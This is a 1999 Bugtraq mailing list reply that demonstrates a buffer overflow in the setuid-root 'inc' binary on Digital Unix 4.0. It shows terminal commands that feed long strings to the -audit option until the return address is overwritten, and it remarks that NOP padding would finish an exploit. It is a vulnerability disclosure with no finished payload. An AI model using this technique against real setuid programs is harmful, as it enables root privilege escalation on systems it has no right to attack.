Bugtraq mailing list archives
Re: Digital Unix 4.0 exploitable buffer overflows
From: lwcashd () TROUT BIW COM (Larry W. Cashdollar)
Date: Tue, 26 Jan 1999 15:46:27 -0500
I decided to inspect this a little more on a Digital Unix box I had access to.

alpha>> uname -a
OSF1 xxx V4.0 878 alpha
alpha>> head -1 /etc/motd
Digital UNIX V4.0D (Rev. 878); Tue Jul 7 08:39:27 EDT 1998
alpha>> ls -l /usr/bin/mh/inc
-rws--x--x 1 root bin 73728 Dec 29 1997 /usr/bin/mh/inc*
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8169'` foo
Segmentation fault
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8168'` foo
Illegal instruction
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8167'` foo
Segmentation fault
alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8166'` foo
inc: usage: inc [+folder] [switches]

We see at 8168 a's we have overflowed the return address. If I wasn't married I could probably follow this up with the exploit. Just a little nop padding and I think it would be the perfect example of a buffer overflow exploit.

--
Larry W. Cashdollar